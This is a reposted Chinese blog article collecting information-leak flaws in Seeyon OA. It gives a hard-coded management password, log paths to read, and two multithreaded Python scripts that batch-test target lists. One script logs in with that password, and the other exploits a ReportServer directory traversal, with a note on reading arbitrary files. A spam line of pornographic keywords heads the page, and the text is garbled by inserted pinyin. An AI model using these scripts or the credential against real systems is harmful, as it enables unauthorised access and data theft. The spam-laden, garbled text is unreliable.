国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)

這篇具有很好參考價(jià)值的文章主要介紹了致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

前言

用友致遠(yuǎn)OA協(xié)同管理軟件為企事業(yè)組織提供了一個(gè)協(xié)同辦公門戶和管理平臺(tái),涵蓋了組織運(yùn)營涉及的協(xié)作管理、審批管理、資源管理、知識(shí)管理、文化管理、公文管理等內(nèi)容,支持企事業(yè)組織的信息化擴(kuò)展應(yīng)用,能有效幫助組織解決戰(zhàn)略落地、文化建設(shè)、規(guī)范管理、資源整合、運(yùn)營管控等難題,是組織管理的最佳實(shí)踐。

產(chǎn)品系列: A3、A6、A8
品牌: 用友
對(duì)象: 微型、小型企業(yè)、企業(yè)部門級(jí)

敏感信息泄露

A6 status.jsp 信息泄露漏洞

漏洞描述

致遠(yuǎn)OA A8-m 存在狀態(tài)監(jiān)控頁面信息泄露,攻擊者可以從其中獲取網(wǎng)站路徑和用戶名等敏感信息進(jìn)一步攻擊

漏洞影響

致遠(yuǎn)OA A8-m

網(wǎng)絡(luò)測(cè)繪

title=“A8-m”

漏洞復(fù)現(xiàn)

訪問監(jiān)控頁面

/seeyon/management/status.jsp
后臺(tái)密碼為 WLCCYBD@SEEYON
登錄后通過如下url獲得一些敏感信息

/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log

致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)

POC 批量檢測(cè)

思路:python post發(fā)包登陸,頭部location:會(huì)進(jìn)行跳轉(zhuǎn)以及狀態(tài)碼一般為302

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-18 11:14
@Author  : whgojp
@File    : POC.py

'''
import requests
from threading import Thread

THREAD_NUM = 10

password = 'WLCCYBD@SEEYON'

with open('urls.txt', 'r') as f:
    urls = [url.strip() for url in f.readlines()]


def check_url(url):
    if 'https' not in url:
        url = 'http://' + url
    try:
        # 發(fā)送POST請(qǐng)求
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': url + '/seeyon/management/index.jsp',
        }
        response = requests.post(url + '/seeyon/management/index.jsp', data={'password': password}, headers=headers,
                                 allow_redirects=False)
        # 判斷是否登錄成功
        if response.status_code == 302 and 'Location' in response.headers and response.headers['Location'].endswith(
                '/seeyon/management/status.jsp'):
            # 登錄成功,輸出URL
            print(url + ' is vulnerable')
            with open("result.txt", "a") as f:
                f.write(f"{url} is vulnerable.\n")
        else:
            # 登錄失敗
            pass
    except:
        # 出現(xiàn)異常
        pass

threads = []
for i in range(THREAD_NUM):
    thread_urls = urls[i::THREAD_NUM]
    thread = Thread(target=lambda urls: [check_url(url) for url in urls], args=(thread_urls,))
    threads.append(thread)

for thread in threads:
    thread.start()

for thread in threads:
    thread.join()

致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)

getSessionList.jsp Session泄漏漏洞

漏洞描述

通過使用存在漏洞的請(qǐng)求時(shí),會(huì)回顯部分用戶的Session值,導(dǎo)致出現(xiàn)任意登錄的情況

網(wǎng)絡(luò)測(cè)繪

app=“致遠(yuǎn)互聯(lián)-OA”

批量檢測(cè)POC

致遠(yuǎn)OA 帆軟組件 ReportServer 目錄遍歷漏洞

漏洞描述

致遠(yuǎn)OA 帆軟組件 ReportServer接口存在目錄遍歷漏洞,攻擊者通過漏洞可以獲取服務(wù)器敏感信息

漏洞影響

致遠(yuǎn)OA 帆軟組件

網(wǎng)絡(luò)測(cè)繪

title=“致遠(yuǎn)A8-V5協(xié)同管理軟件 V6.1sp1”

POC(批量檢測(cè))

# -*- coding: utf-8 -*-
'''
@Time    : 2023-03-20 16:53
@Author  : whgojp
@File    : POC.py
'''
import requests
import threading
def check_url(url, counter):
    if 'https' not in url:
        url = 'http://'+url
    try:
        url = url + '/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true '
        response = requests.get(url, timeout=5)
        if response.status_code == 200:
            print(f"{url} is accessible.")
            with open("result.txt", "a") as f:
                f.write(f"{url} is accessible.\n")
        else:
            pass
    except requests.exceptions.RequestException as e:
        pass
    counter[0] += 1
    print(f"Scanning progress: {counter[0]}/{counter[1]}")
    
urls = []
with open("urls.txt", "r") as f:
    for line in f:
        urls.append(line.strip())
threads = []
counter = [0, len(urls)]
for url in urls:
    thread = threading.Thread(target=check_url, args=(url, counter))
    thread.start()
    threads.append(thread)
for thread in threads:
    thread.join()

致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)
致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)
如果要讀取文件進(jìn)行目錄遍歷,只需要更改file_path就行了

A6 createMysql.jsp 數(shù)據(jù)庫敏感信息泄露漏洞

待續(xù)文章來源地址http://www.zghlxwxcb.cn/news/detail-432973.html

A6 DownExcelBeanServlet 用戶敏感信息漏洞

A6 initDataAssess.jsp 用戶敏感信息漏洞

A6 config.jsp 敏感信息泄漏漏洞

到了這里,關(guān)于致遠(yuǎn)OA敏感信息泄露漏洞合集(含批量檢測(cè)POC)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【漏洞復(fù)現(xiàn)-通達(dá)OA】通達(dá)OA get_contactlist.php 敏感信息泄漏漏洞

    【漏洞復(fù)現(xiàn)-通達(dá)OA】通達(dá)OA get_contactlist.php 敏感信息泄漏漏洞

    通達(dá)OA get_contactlist.php文件存在信息泄漏漏洞,攻擊者通過漏洞可以獲取敏感信息,進(jìn)一步攻擊。 ● 通達(dá)OA2013 ● hunter app.name=\\\"通達(dá) OA\\\" ● 特征 四、漏洞復(fù)現(xiàn)

    2024年02月20日
    瀏覽(17)
  • 實(shí)戰(zhàn)敏感信息泄露高危漏洞挖掘利用

    實(shí)戰(zhàn)敏感信息泄露高危漏洞挖掘利用

    信息泄露就是某網(wǎng)站某公司對(duì)敏感數(shù)據(jù)沒有安全的保護(hù),導(dǎo)致泄露敏感被攻擊者利用,例如泄露:賬號(hào),密碼,管理員,身份證,數(shù)據(jù)庫,服務(wù)器,敏感路徑等等 如果進(jìn)了業(yè)務(wù)系統(tǒng)可以SQL注入,文件上傳,getshell獲取服務(wù)器權(quán)限高危操作 例如: 可以根據(jù)賬號(hào),猜測(cè)默認(rèn)密碼

    2023年04月08日
    瀏覽(32)
  • Web漏洞-敏感信息泄露-后臺(tái)地址爆破

    Web漏洞-敏感信息泄露-后臺(tái)地址爆破

    通過爬蟲去爬取網(wǎng)站目錄,然后將爬取到目錄進(jìn)行展現(xiàn),同時(shí)也可以匹配關(guān)鍵目錄,如:admin,manger等。 實(shí)驗(yàn)環(huán)境:kali 實(shí)驗(yàn)工具:Dirb 默認(rèn)情況下后臺(tái)地址是不應(yīng)被搜索引擎爬取到,因?yàn)楹笈_(tái)涉及到關(guān)鍵信息的展示和配置,如果后臺(tái)地址簡(jiǎn)單或者后臺(tái)存在未授權(quán)問題,則會(huì)給

    2024年02月12日
    瀏覽(24)
  • Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞(CVE-2023-28432)

    Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞(CVE-2023-28432)

    Goby預(yù)置了最具攻擊效果的漏洞引擎,覆蓋Weblogic,Tomcat等最嚴(yán)重漏洞。每天從互聯(lián)網(wǎng)(如CVE)會(huì)產(chǎn)生大量的漏洞信息,我們篩選了會(huì)被用于真實(shí)攻擊的漏洞進(jìn)行每日更新。Goby也提供了可以自定義的漏洞檢查框架,發(fā)動(dòng)了互聯(lián)網(wǎng)的大量安全從業(yè)者貢獻(xiàn)POC,保證持續(xù)的應(yīng)急響應(yīng)能

    2024年02月15日
    瀏覽(25)
  • MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)

    MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)

    漏洞描述: MinIO 是一種開源的對(duì)象存儲(chǔ)服務(wù),它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一種高性能、高可用性的分布式存儲(chǔ)系統(tǒng),它可以存儲(chǔ)大量數(shù)據(jù),并提供對(duì)數(shù)據(jù)的高速讀寫能力。MinIO 采用分布式架構(gòu),可以在多個(gè)節(jié)點(diǎn)上運(yùn)行,從而實(shí)現(xiàn)數(shù)據(jù)的分布式存

    2023年04月08日
    瀏覽(35)
  • 致遠(yuǎn)OA wpsAssistServlet 任意文件上傳漏洞 漏洞復(fù)現(xiàn)

    致遠(yuǎn)OA wpsAssistServlet 任意文件上傳漏洞 漏洞復(fù)現(xiàn)

    致遠(yuǎn)OA是一套辦公協(xié)同管理軟件。致遠(yuǎn)OA wpsAssistServlet接口存在任意文件上傳漏洞,攻擊者通過漏洞可以發(fā)送特定的請(qǐng)求包上傳惡意文件,獲取服務(wù)器權(quán)限。 致遠(yuǎn)OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致遠(yuǎn)OA G6、G6N (V8.1、V8.1SP1) 1、調(diào)用文件上傳接口上傳測(cè)試文件,請(qǐng)求包如下: 2、

    2024年02月11日
    瀏覽(24)
  • pikachu靶場(chǎng)-敏感信息泄露

    pikachu靶場(chǎng)-敏感信息泄露

    敏感信息泄漏簡(jiǎn)述 攻擊方式 常見的攻擊方式主要是掃描應(yīng)用程序獲取到敏感數(shù)據(jù) 漏洞原因 應(yīng)用維護(hù)或者開發(fā)人員無意間上傳敏感數(shù)據(jù),如 github 文件泄露 敏感數(shù)據(jù)文件的權(quán)限設(shè)置錯(cuò)誤,如網(wǎng)站目錄下的數(shù)據(jù)庫備份文件泄露 網(wǎng)絡(luò)協(xié)議、算法本身的弱點(diǎn),如 telent、ftp、md5 等

    2024年02月09日
    瀏覽(22)
  • 【Android】logcat日志敏感信息泄露

    之前會(huì)遇到一些應(yīng)用logcat打印敏感信息,包括但不限于賬號(hào)密碼,cookie憑證,或一些敏感的secretkey之類的,下面客觀的記錄下起危害性。 ?1. logcat logcat是Android系統(tǒng)提供的一種記錄日志的工具。它可以幫助開發(fā)人員診斷應(yīng)用程序中的問題,例如崩潰、內(nèi)存泄漏和性能問題。l

    2024年02月07日
    瀏覽(34)
  • Web安全系列——敏感信息泄露與加密機(jī)制

    數(shù)字化時(shí)代,越來越多的數(shù)據(jù)正在被傳輸?shù)絎eb應(yīng)用程序中,這其中不乏個(gè)人或機(jī)構(gòu)的敏感信息。 如果Web應(yīng)用程序未采取正確的加密機(jī)制,這些信息可能會(huì)遭到竊取或篡改,從而使用戶數(shù)據(jù)或機(jī)構(gòu)的財(cái)產(chǎn)受到威脅。 竊取用戶利益 :攻擊者將有可能竊取個(gè)人信息(信用卡號(hào)、密

    2024年02月06日
    瀏覽(30)
  • 【web滲透思路】框架敏感信息泄露(特點(diǎn)、目錄、配置)

    【web滲透思路】框架敏感信息泄露(特點(diǎn)、目錄、配置)

    ? 博主:網(wǎng)絡(luò)安全領(lǐng)域狂熱愛好者(承諾在CSDN永久無償分享文章)。 殊榮:CSDN網(wǎng)絡(luò)安全領(lǐng)域優(yōu)質(zhì)創(chuàng)作者,2022年雙十一業(yè)務(wù)安全保衛(wèi)戰(zhàn)-某廠第一名,某廠特邀數(shù)字業(yè)務(wù)安全研究員,edusrc高白帽,vulfocus、攻防世界等平臺(tái)排名100+、高校漏洞證書、cnvd原創(chuàng)漏洞證書等。 擅長(zhǎng):對(duì)

    2023年04月19日
    瀏覽(17)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包